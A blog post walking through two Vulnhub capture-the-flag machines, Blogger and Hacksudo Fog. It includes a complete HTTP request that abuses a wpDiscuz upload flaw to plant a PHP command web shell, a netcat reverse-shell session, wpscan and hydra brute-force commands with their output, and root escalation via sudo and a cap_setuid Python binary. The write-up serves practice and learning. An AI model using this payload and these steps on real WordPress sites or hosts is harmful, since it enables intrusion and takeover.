---
layout: post
title:  "Vulnhub: HACKSUDO: Fog and Blogger"
date:   2021-05-22 20:30:00 +1000
category: hacking
---

## HACKSUDO: Fog and Blogger
I've recently done [HACKSUDO: Fog](https://www.vulnhub.com/entry/hacksudo-fog,697/) and [Blogger](https://www.vulnhub.com/entry/blogger-1,675/) from Vulnhub but I'm struggling for motivation a bit at the moment so this will be pretty brief. 

Blogger first.

## Ports
SSH and HTTP.

## HTTP 
This is basically a hidden Wordpress installation; it's at http://blogger.thm/assets/fonts/blog/ 

Note we were told:

>Add blogger.thm to /etc/hosts file

So we can assume this was intended for TryHackMe? If it comes up there it'll be an easy pwn. Anyway, with a thorough wpscan (get ye an API token):

``
wpscan -e --url http://blogger.thm/assets/fonts/blog/ --api-token LOL_GET_YOUR_OWN --plugins-detection aggressive
``

you can find what you want, which is a vulnerable plugin called [wpDiscuz](https://github.com/hoanx-2146/wpDiscuz_unauthenticated_arbitrary_file_upload). Now according to that page it has a metasploit module but it's not loaded by default in my version of Kali anyway. I did load it but it still wouldn't run so just do it manually with Burp Suite. It's a pre-auth unrestricted file upload so you can get a shell or whatever. 

{% highlight shell %}
POST /assets/fonts/blog/wp-admin/admin-ajax.php HTTP/1.1
Host: blogger.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2048175503286114511976579529
Content-Length: 747
Origin: http://blogger.thm
Connection: close
Referer: http://blogger.thm/assets/fonts/blog/?p=27
Cookie: wordpress_test_cookie=WP+Cookie+check; wpdiscuz_hide_bubble_hint=1

-----------------------------2048175503286114511976579529
Content-Disposition: form-data; name="action"

wmuUploadFiles
-----------------------------2048175503286114511976579529
Content-Disposition: form-data; name="wmu_nonce"

06b879b0c5
-----------------------------2048175503286114511976579529
Content-Disposition: form-data; name="wmuAttachmentsData"

undefined
-----------------------------2048175503286114511976579529
Content-Disposition: form-data; name="wmu_files[0]"; filename="cmd.php"
Content-Type: image/gif

GIF8 <?php system($_GET['cmd']);?>
-----------------------------2048175503286114511976579529
Content-Disposition: form-data; name="postId"

27
-----------------------------2048175503286114511976579529--
{% endhighlight %}

Note the first time I tried this it wouldn't work; I had to reinstall the box in VirtualBox and after I'd done that it was all good.

## Privesc
There are a few rabbit holes here; at least that's how it looks. We have a root cron job running a wildcard **tar**; but in order to exploit it we need to be James. We can get the hash from mysql after we get the creds from wp-config.php but the hash doesn't want to crash. The mysql password is not reused for James. And even after I got root and read the shadow file, the system hash for James doesn't want to crack either. So the tar/cron path appears to be a rabbit hole. We also have a file called /opt/.creds that looks like gibberish:

{% raw %}
';u22>'v$)='2a#B&>`c'=+C(?5(|)q**bAv2=+E5s'+|u&I'vDI(uAt&=+
(|`yx')Av#>'v%?}:#=+)';y@%'5(2vA!'<y$&u"H!"ll
{% endraw %}

Maybe I'm supposed to be able to decrypt that; dunno. Anyway we have a user (vagrant) with a weak password (vagrant) who can do anything:

{% highlight shell %}
┌──(root💀kali)-[/opt/vulnhub/blogger]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.236] 57662
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ress/assets/fonts/blog/wp-content/uploads/2021/05$ su vagrant
su vagrant
Password: vagrant

<ress/assets/fonts/blog/wp-content/uploads/2021/05$ sudo -u root su
sudo -u root su
<ress/assets/fonts/blog/wp-content/uploads/2021/05# id
id
uid=0(root) gid=0(root) groups=0(root)
{% endhighlight %}

Looking through auth.log and in the home directories:

{% highlight shell %}
root@ubuntu-xenial:/home/vagrant/.ssh# cat au
cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCfmqiMY0t8f+InjxZAAMCHW8Zvbd0GRljA7baIioIIUD2jyEDx56UcYd73AXwNiemyJ857dGvgmiNdjbpvynN9Q66SD5X0sA+pjZhCW6QLLwjuqXkT0sEg+U6dRgzN4JT6NSzmmKouoZUFFclhQeB3n0rrbFW1IUyLk9UET/mfYlw7v1/+0rKvsw69Z9M8GnHuhoroTAR6bRz4oontqsAuxlIRPo/vCVggyWOUg3Q81loLLv0indfWJroWWtqR/6JP2Ginfuk66+WS6BAut6nRs4IMAKvqLyl0Roiv/DAKvGxFVUdgvSMQ5jSEDjNsmZ463wExeg0ObrTghHWIlFI3 vagrant
{% endhighlight %}

It seems pretty clear we were supposed to use vagrant and the rest was a distraction.

## Hacksudo FOG
We had to bruteforce FTP on this box:

{% highlight shell %}
┌──(root💀kali)-[/opt/vulnhub/hacksudofog]
└─# hydra -l hacksudo -P ./dict.txt ftp://192.168.1.233 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-17 07:59:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
[DATA] attacking ftp://192.168.1.233:21/
[21][ftp] host: 192.168.1.233   login: hacksudo   password: hackme
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-17 08:00:21
{% endhighlight %}

The file *dict.txt* was on the server; but you needed a pretty thorough enumeration to find it. Next, we got some files from the FTP server and did some stego to get back some more creds:

>wwww.localhost/fog Username=fog:password=hacksudoISRO

Which was rot23 from 'zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR'

Next we could login to the CMS on the website and get ourselves a shell; nothing too complicated. 

On the box, **look** had the SUID bit so we could read the root flag or shadow file. The hash for **isro** cracked extremely quickly (qwerty) and isro could do this:

{% highlight shell %}
isro@hacksudo:/dev/shm$ sudo -l
sudo -l
[sudo] password for isro: qwerty

Matching Defaults entries for isro on hacksudo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User isro may run the following commands on hacksudo:
    (root) /usr/bin/ls /home/isro/*
{% endhighlight %}

Erm yeah ok. Anyway *fog* had the cap_setuid capability and running it opened a python shell so that was that:

{% highlight shell %}
isro@hacksudo:~/fog$ fog -h
fog -h
Python 2.7.16 (default, Oct 10 2019, 22:02:15) 
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> id
id
<built-in function id>
>>> import os 
import os
>>> os.system("/bin/bash")
os.system("/bin/bash")
root@hacksudo:~/fog# id
id
uid=0(root) gid=1003(isro) groups=1003(isro)
root@hacksudo:~/fog# id;hostname;date
id;hostname;date
uid=0(root) gid=1003(isro) groups=1003(isro)
hacksudo
Mon 17 May 2021 08:31:04 AM EDT
{% endhighlight %}

I probably left out some detail here but whatever. It was good; I'm just a bit weary. And possibly a bit over CTFs at the moment.
